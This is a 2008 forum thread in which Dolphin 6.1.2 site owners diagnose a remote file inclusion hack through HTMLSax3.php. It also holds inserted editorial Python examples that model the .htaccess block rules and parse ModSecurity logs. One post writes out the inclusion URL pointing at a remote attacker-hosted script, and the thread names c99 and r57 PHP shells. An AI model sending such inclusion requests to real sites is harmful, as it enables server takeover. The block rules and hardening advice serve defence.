Security Problem at Dolphin 6.1.2 ?!

realmasterd posted 9th of July 2008 in Community Voice. 31 comments.
Hello from Germany.

We think that Dolphin 6.1.2 has a security problem!
Some German webmasters' Dolphin websites have been hacked.

We have found this information:
http://www.astalavista.com/index.php?section=exploits&cmd=details&id=6128

Antivirus software has found a trojan in
\plugins\safehtml\templates.php

Here is the code from this file:
http://test.tunelife.de/template.txt

All access and some other things go to this e-mail address:
r57ssh@gmail.com

We hope that somebody can find a solution.

greetz
http://dolphin-forum.eu
 
Comments
jerry79
Hi,
well, I don't have template.php in this directory, so I can't find it.
And yes, the link which you posted to open the file results in a warning from AV...

Greets
Jerry
jerry79
LOL, funny, a "Thumbs down" for replying and saying what I see and got...
Do you know how many sites have been hacked?
Please let us know or give us some examples.
Maybe there is a corrupted installer file somewhere on the net and these guys downloaded it.
Because the user with the mail above is doing that shit on other platforms also. Check Google for this.
For me, I don't find anything about it, also not such a file... But tonight I'll download my whole dir and scan it.
So from my side: no risk from the original package.
realmasterd
hello,

we contacted the webmasters to find out about 3rd-party mods/plugins,
for example HTML in comments or something else..

if I have more, I'll write it ;)
realmasterd
feedback:
the first webmaster has these mods/plugins:
calendar, safehtml, tiny_mce

the second webmaster has the original Dolphin version without any mods/plugins!

both were hacked.
realmasterd
here is a screenshot after the hack:
http://www.pictureupload.de/originals/pictures/090708153724_Unbenannt.jpg
IceHoff
Yep!! Have seen that too...
I've just put a "Deny from all" in the directories concerned by the security hole.
jerry79
Ok, I scanned the original Dolphin package for gmail... Only results from authors.
Also I didn't find any templates.php inside there.
The plugins which you listed are original ones which you got from the package.
So maybe the hacker came through another hole on the server to it. As I remember, Dolphin was checked and branded as hack safe....
I think that he maybe used a wrong mod or something else. Do you know which kind of mods he installed on the server?
crswsystem
But it can not be; we have no mods installed and our firewall shows no attacks from the outside, so it can only be from the original file pack.
shaneed
I also wonder how that is possible. Dolphin has got Hacker Safe, that means it should be safe, right? Or who knows who these guys from Hacker Safe are; maybe they just take money from people and don't do anything. I was called by them so many times asking if I want their service. They sounded so insistent...
jerry79
Well, maybe then you got the package from another site.
Yet, now, I don't know which exploit they can use to put the file through Dolphin onto your server...
Also I think that then there must be a lot more guys who got hacked. Because when you are able to get into a system, then you are looking for another one, and it's easy to search Google for peeps who are running Dolphin...
It's just my mind...
But we will see what an official from Boonex will say..
shaneed
If it's not a Dolphin security hole that Boonex omitted, then it must be a mod you installed that made Dolphin insecure. It can also be from your hosting. There are some phantom hosting companies that are dealing with unimaginable things. I also experienced it on my own. Or just maybe because your hosting is on a Windows platform and not Linux? Because on Windows servers you cannot set up file permissions.
mikesta
I just know about three sites having the problem since today, so there are mods installed, but as described on www.astalavista.com, there are some security holes.

And using them is not the hardest way. Just go to YouTube and search for RFI hack and you will find a huge amount of detailed descriptions to hack sites like Dolphin within a few minutes.

I think there should be some coder work done to make it safer.
DosDawg
this is my opinion, and i could be wrong. but i have seen this script before. the c99 used to have a black widow as a logo image.

what i believe is that this person who had their site hacked is on a shared server, and being a shared server, this would be injected with no trace of it being used. since it would be loaded on an account that is on the server, you can then browse certain files that would give up parameters that would allow injection via a remote shell, but it's not remote, it's a php shell, and be able to cause these problems.

if any of you have ever been involved in wordpress, phpnuke, post nuke, e107, joomla, drupal, b2Evo or any other open source script, you have seen this same attack, and from what i know about this c99 remote shell attack it's mostly on shared servers, or where you downloaded something from somebody, or allowed uploads on your site, and this was placed on your server.

specifically, is dolphin vulnerable? i suppose all scripts are, and the time spent trying to secure them is astronomical. i just googled c99 shell script, and there are 190k returns, so this is not new to dolphin. i didn't read anything that would determine what makes one site or one server more vulnerable than the next, but my point in hand is this remote shell is a well known hack amongst kids.

well i hope this sheds some light on the situation.

later,
DosDawg
Technoman
well from what i was told by someone today who knows a lot more than myself about security

as i have 2 VPS servers myself ( running LINUX )

the provider who runs these servers

"he says that any VPS server you're running on can be hacked from inside by another user since most VPS servers are shared with a lot of users" ...

=====

this is my thought on VPS

VPS servers are shared by a lot of different users and if you plan on hosting a big site
( i would not recommend using VPS as everyone is hogging the memory on that server )
with for example 10 people on 1 VPS just imagine how much RAM is being chewed up at 1 time because it's being shared

====

( the best thing is to have a dedicated server )
+
no one shares or hogs the memory as this machine is strictly yours like a home computer * everything is dedicated to you* )

i'm just telling you what i've been told about security with VPS
and hopefully this will help you realize: don't always think because you're hosting on a shared server that you're safe, because you're more at risk depending on all sorts of situations, and just because the price is cheaper for VPS servers means that there are pros and cons about the whole thing ....

go with a Dedicated Server ( pay 10$ more but everything is dedicated to you )

example
29.99$ VPS Server
39.99$ dedicated Server <--- ( this is what i would choose )
DosDawg
just asking a question because this only happens every time you come around. are you tagging every post i have on here with a negative vote? you can be honest, i won't eat ya or nothing. if it is you, please refrain; if not, then carry on. but i know without a doubt that before you came in here and posted, i had one thumbs up on that post.

holla,
DosDawg
DosDawg
techno, where are you finding dedicated boxes for 40 bucks a month? lol, i spend 225 a month for a dedicated box; maybe the managed has a little to do with that price, but a good server and good support staff are hard to come by. i found one and it costs money for good skills and good equipment.

later,
DosDawg
Technoman
There are dedicated servers out there for the same price as a VPS these days - some start as low as $29 a month!!!

Generally, a dedicated server is better than a VPS - they are the same amount of work to maintain - and at least with a dedicated one, you have 100% of the system resources 100% of the time.

Don't forget when paying 29$ a month for a Dedicated Server you're not going to receive unlimited BANDWIDTH
( thats for sure ) ...
Technoman
as low as

19.99$ a month for a DEDICATED SERVER

http://www.millenniumdata.com/BUSINESS/Business-Default.asp?include=Business-Dedicated-Servers.asp

i've used them before with
Windows Server 2003

29.99$ ( dedicated server ) i used this one before and it worked great; i was able to hold 1000 users ( video chat ) another chat program
with no problems at all

i received 1000gb of bandwidth a month
( very good for that price )

go take a look at that site ....

a lot of my friends use it because i told them about it
Technoman
http://www.millenniumdata.com/BUSINESS/Business-Default.asp?include=L1GAMER.asp

instead of windows server 2003 they have been replaced with windows xp for the same price

i used their 59.99$ also which is a lot more BANDWIDTH
Technoman
their 29.99$ a month for xp pro ( dedicated Server )
is a good machine
in my opinion windows xp pro is much faster than windows 2003
sammie
i also pay $230 a month for a dedicated server, i have never looked back, as with VPS and any shared hosting, a hacker can just get an account and he has access to every site that's on the shared host or VPS. none are secure.

you get what you pay for. and that is what people don't understand, a dedicated server for $50 is an old slow server but ideal for running a few dolphin sites from it.
it would give you the skills to move up as your sites become popular. so for once i agree with technoman, and he gets a thumbs up for once
Splinter
friends, could someone reproduce the hack? I am a little bit scared to try the POC links from Astalavista on my own installation in order not to infect my server myself ... ;-)
micha_es
it's the HTMLSax3.php.
If allow_url_fopen = on (Dolphin needs this) then you can include everything, because HTMLSax3.php doesn't check this

it seems like this:
http://domain.com/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://somehackdomain.cz/upload/skins/max.txt?

On the German Dolphin forum I found this to make a FIRST fix:

create a .htaccess in /plugins/safehtml/ with:
RewriteEngine On
RewriteCond %{QUERY_STRING} (.*)=http(.*) [NC,OR]
RewriteCond %{QUERY_STRING} (.*)urlx=(.*) [NC]
RewriteRule ^(.*) - [F]
realmasterd
hello again,

many new pieces of information.

it's not directly a Dolphin problem, but Dolphin is the way to hack the server. "allow_url_fopen" is needed for the Orca forum and through this the hacker can hack a server.

they are using this file:
plugins/safehtml/HTMLSax3.php

the ip of the hacker was this one:
http://private.dnsstuff.com/tools/ipall.ch?domain=189.56.100.76

our solution!
edit the .htaccess file and add this:

RewriteEngine On
RewriteCond %{QUERY_STRING} (.*)=http(.*) [NC,OR]
RewriteCond %{QUERY_STRING} (.*)urlx=(.*) [NC]
RewriteRule ^(.*) - [F]

with this they can not include a file which is not on the server.

and you can block the ip.

best regards
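The .htaccess rules that micha_es and realmasterd posted above act on Apache's raw query string, so it helps to see exactly which requests they stop and which they do not. The following is an added example written for this thread, not code from Dolphin, from Apache, or from either poster: it models the two RewriteCond patterns in Python and runs them over constructed query strings (the hostnames are placeholders). The second check, has_remote_stream_value, is a hypothetical application-side check added here to show the kind of request the mod_rewrite filter does not cover; it is not something the thread proposes.

```python
import re
from urllib.parse import parse_qs

# Added example, not code from Dolphin or from the forum posters: a model of
# the two RewriteCond patterns proposed in the thread, applied to raw query
# strings. Apache matches %{QUERY_STRING} before URL-decoding, and [NC] makes
# the match case-insensitive, so the model works on the raw string with
# re.IGNORECASE.
HTACCESS_PATTERNS = [
    re.compile(r"(.*)=http(.*)", re.IGNORECASE),  # RewriteCond ... (.*)=http(.*) [NC,OR]
    re.compile(r"(.*)urlx=(.*)", re.IGNORECASE),  # RewriteCond ... (.*)urlx=(.*) [NC]
]


def htaccess_blocks(query_string: str) -> bool:
    """True if the thread's RewriteRule ^(.*) - [F] would answer 403."""
    return any(p.search(query_string) for p in HTACCESS_PATTERNS)


def has_remote_stream_value(query_string: str) -> bool:
    """Hypothetical application-side check (not the thread's rule): flag any
    parameter whose decoded value starts with a URL scheme such as ftp://,
    which the two .htaccess patterns do not match."""
    for values in parse_qs(query_string, keep_blank_values=True).values():
        for value in values:
            if re.match(r"[a-z][a-z0-9+.-]*://", value, re.IGNORECASE):
                return True
    return False


def classify(query_string: str) -> str:
    """Combine both checks into one verdict for a query string."""
    if htaccess_blocks(query_string):
        return "blocked-by-htaccess"
    if has_remote_stream_value(query_string):
        return "missed-by-htaccess"
    return "allowed"


# Constructed sample query strings; the hostnames are placeholders.
SAMPLES = [
    "dir[plugins]=http://attacker.invalid/skins/max.txt?",  # shape of the thread's example
    "dir[plugins]=HTTPS://attacker.invalid/skins/max.txt",  # [NC] catches the case change
    "urlx=/local/path",                                     # second condition
    "page=2&sort=date",                                     # ordinary request
    "return=http://mysite.invalid/profile",                 # legitimate value, still 403
    "dir[plugins]=ftp://attacker.invalid/skins/max.txt",    # other wrapper, not matched
]


def audit(samples=SAMPLES) -> dict:
    """Map each sample query string to its verdict."""
    return {qs: classify(qs) for qs in samples}


if __name__ == "__main__":
    for qs, verdict in audit().items():
        print(f"{verdict:20} {qs}")
```

Two things the run makes visible: the filter is coarse enough to return 403 for any legitimate parameter that happens to carry an http URL, and it only matches the literal strings it names, so it is a stopgap rather than a fix. The later posts in the thread point at the actual configuration causes (register_globals and allow_url_fopen), which is where the durable fix belongs.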
nurke
so what do we do with plugins/safehtml/HTMLSax3.php ???
Please let us know
realmasterd
you can use your original .htaccess!

put this code at the end of the .htaccess, before </IfModule>

RewriteCond %{QUERY_STRING} (.*)=http(.*) [NC,OR]
RewriteCond %{QUERY_STRING} (.*)urlx=(.*) [NC]
RewriteRule ^(.*) - [F]
realmasterd
so, in other posts I have read the solution!

register_globals must be off.

thanks all!
Truehookups
[Sun Jul 13 11:13:04 2008] [error] [client 217.217.156.81] ModSecurity: Access denied with code 406 (phase 2). Match of "rx ^apache.*perl" against "REQUEST_HEADERS:User-Agent" required. [msg "Request Indicates an automated program explored the site"] [severity "NOTICE"] [hostname "www.com"] [uri "/music/all/10/plugins/safehtml/HTMLSax3.php"] [unique_id "DL1-F0PUqYIAACsTCG4AAAAT"]
ModSecurity is blocking these 1-4 times an hour
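The ModSecurity line Truehookups quoted is a useful detection signal: it carries the client address, the matched rule message and the requested URI, so a log of such lines can show who keeps probing plugins/safehtml/HTMLSax3.php. The parser below is an added example written for this thread, not part of Dolphin, ModSecurity or the poster's setup. Its sample log contains the line quoted above plus constructed lines with a TEST-NET address, a placeholder hostname and made-up unique_id values; the watch path and the field names it extracts are assumptions based on that one line.

```python
import re
from collections import Counter
from typing import Dict, List, Optional

# Added example, not part of the thread, Dolphin or ModSecurity: parse Apache
# error_log lines written by ModSecurity 2.x denials and count which clients
# keep hitting the file the thread is worried about.
HEAD_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] \[client (?P<client>[^\]]+)\] "
    r"ModSecurity: Access denied with code (?P<code>\d+)"
)
# Bracketed key "value" tags that follow the rule message.
TAG_RE = re.compile(r'\[(?P<key>msg|severity|hostname|uri|unique_id) "(?P<val>[^"]*)"\]')

# Assumed path of interest, taken from the thread.
WATCH_SUFFIX = "/plugins/safehtml/HTMLSax3.php"


def parse_modsec_line(line: str) -> Optional[Dict[str, str]]:
    """Return the fields of one ModSecurity denial, or None for any other line."""
    head = HEAD_RE.match(line)
    if head is None:
        return None
    record = head.groupdict()
    record.update((t.group("key"), t.group("val")) for t in TAG_RE.finditer(line))
    return record


def summarize(lines: List[str], watch_suffix: str = WATCH_SUFFIX) -> dict:
    """Count denials per client and per URI, and collect hits on the watched file."""
    per_client: Counter = Counter()
    per_uri: Counter = Counter()
    watched = []
    for line in lines:
        rec = parse_modsec_line(line)
        if rec is None:
            continue
        per_client[rec["client"]] += 1
        per_uri[rec.get("uri", "")] += 1
        if rec.get("uri", "").endswith(watch_suffix):
            watched.append(rec)
    return {"per_client": per_client, "per_uri": per_uri, "watched": watched}


SAMPLE_LOG = [
    # Line quoted by Truehookups in the thread:
    '[Sun Jul 13 11:13:04 2008] [error] [client 217.217.156.81] ModSecurity: Access denied with code 406 (phase 2). Match of "rx ^apache.*perl" against "REQUEST_HEADERS:User-Agent" required. [msg "Request Indicates an automated program explored the site"] [severity "NOTICE"] [hostname "www.com"] [uri "/music/all/10/plugins/safehtml/HTMLSax3.php"] [unique_id "DL1-F0PUqYIAACsTCG4AAAAT"]',
    # Constructed lines (TEST-NET address, placeholder hostname and ids):
    '[Sun Jul 13 12:40:17 2008] [error] [client 192.0.2.10] ModSecurity: Access denied with code 406 (phase 2). Match of "rx ^apache.*perl" against "REQUEST_HEADERS:User-Agent" required. [msg "Request Indicates an automated program explored the site"] [severity "NOTICE"] [hostname "www.example.invalid"] [uri "/plugins/safehtml/HTMLSax3.php"] [unique_id "CONSTRUCTED-0001"]',
    '[Sun Jul 13 12:41:03 2008] [error] [client 192.0.2.10] ModSecurity: Access denied with code 406 (phase 2). Match of "rx ^apache.*perl" against "REQUEST_HEADERS:User-Agent" required. [msg "Request Indicates an automated program explored the site"] [severity "NOTICE"] [hostname "www.example.invalid"] [uri "/index.php"] [unique_id "CONSTRUCTED-0002"]',
    # Unrelated error_log line, skipped by the parser:
    '[Sun Jul 13 12:42:00 2008] [notice] caught SIGTERM, shutting down',
]


if __name__ == "__main__":
    result = summarize(SAMPLE_LOG)
    for client, count in result["per_client"].most_common():
        print(f"{count:4}  {client}")
    for rec in result["watched"]:
        print(rec["ts"], rec["client"], rec["uri"])
```

Counting per client rather than per line is what makes the output actionable: one address hitting HTMLSax3.php repeatedly is a scanner to block or rate-limit, while a single hit from many addresses (the situation the1kewldude describes below with dynamic IPs) argues for fixing the configuration instead of chasing addresses.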
the1kewldude
Hey guys, first I want to say that this is a great concept. I'm new here and like a lot of what I see. BUT.... There are some issues. PHP injection is the problem here and is done with remote shell scripts like c99 and r57. This happens when you "allow_url_fopen". I have it turned off. Everyone says it must be turned on, but this is not entirely true. I suggest, if you really want to stop these attacks, to turn that off. There are CGI scripts that can prevent this by sidestepping PHP in the call function and that will perform the same function in the code, while maintaining security. Mod rewrites like the one suggested above will help as well. But the best recommendation I can make is to turn off allow_url_fopen. Use a different forum platform or incorporate a CGI script. It will take a little time to sort through the code to replace, but will be well worth your time. Banning IP addresses does little to help unless you block the entire block, as most of these bad guys are on dynamic accounts where the IP changes every time they get online. These attacks are done by putting remote shell access scripts on a server. The bad guys are running bots that scan websites and find that you are using a vulnerable platform (i.e. Dolphin). Once they know that, they inject the code through allow_url_fopen. These scripts are in text format, so any server allowing people to post on them is vulnerable to assisting in these attacks without their knowledge. Most of these attacks are done by placing a script in a public place and then calling the script from another. Allowing url_fopen poses a risk. It's just a matter of time before those of you on "dedicated servers" start experiencing these same issues. BTW, I am going through this code with a fine-tooth comb and am finding that allow_url_fopen is being used for more than just the Orca forum. I will post more as I inspect the code.
As I said in my opening statement, I like this concept and I would love to see it improved and made more secure.
Oh, one other thing: most of these bad guys are using wwwlib or the Indy library as the user agent; blocking these agents in your .htaccess file will slow down the attacks. The only problem with that is the user agent name in the attacking library can be modified.